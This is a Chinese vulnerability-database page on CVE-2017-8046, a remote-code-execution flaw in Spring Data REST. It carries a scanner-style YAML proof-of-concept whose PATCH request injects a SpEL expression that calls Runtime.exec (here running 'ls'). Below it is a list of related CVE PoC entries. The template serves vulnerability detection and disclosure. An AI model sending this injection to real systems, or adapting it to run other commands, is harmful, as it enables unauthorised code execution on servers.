CVE-2017-8046: Spring Data Rest RCE

漏洞描述

PoC代码[已公开]

id: CVE-2017-8046

info:
  name: Spring Data Rest RCE
  author: sm
  severity: critical
  verified: true
  description: |
    SpringDataREST是一个构建在SpringData之上，为了帮助开发者更加容易地开发REST风格的Web服务。在RESTAPI的Patch方法中（实现RFC6902），path的值被传入setValue，导致执行了SpEL表达式，触发远程命令执行漏洞。
  reference:
    - https://tanzu.vmware.com/security/cve-2017-8046
    - https://mp.weixin.qq.com/s/q2CNe9sscjlBXVaVUMCGNA
  tags: cve,cve2017,spring,rce
  created: 2024/02/04

set:
  oob: oob()
  oobDNS: oob.DNS
  spel: decimal("ping " + oobDNS,",")
rules:
  r0:
    request:
      method: PATCH
      path: /customers/1
      headers:
        Content-Type: application/json-patch+json
      body: |
        [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{108,115}))/lastname", "value": "ry" }]
    expression: response.status == 400 && response.body.bcontains(b'cause') && response.body.bcontains(b'message')
expression: r0()

相关漏洞推荐

• CVE-2017-8046: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution POC

  2025-08-01 | Spring Data REST
  Spring Data REST < 2.6.9 and 3.0.1, Spring Boot < 1.5.9 and 2.0 M6 contain a remote code execu...

• Spring Data Rest 远程命令执行漏洞（CVE-2017-8046） 无POC

  2021-09-13 | Spring Data Rest
  Spring Data REST是一个构建在Spring Data之上，为了帮助开发者更加容易地开发REST风格的Web服务。在RESTAPI的Patch方法中（实现RFC6902），path的值被传...

• CVE-2017-1000028: GlassFish LFI POC

  2025-09-01 | GlassFish
  GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。GlassFish漏洞成因:java语义中会把&quo...

• CVE-2017-1000486: Primetek Primefaces 5.x - Remote Code Execution POC

  2025-09-01 | Primetek Primefaces
  Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.

• CVE-2017-10271: WebLogic XMLDecoder 反序列化漏洞 CVE-2017-10271 POC

  2025-09-01 | WebLogic XMLDecoder
  Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WL...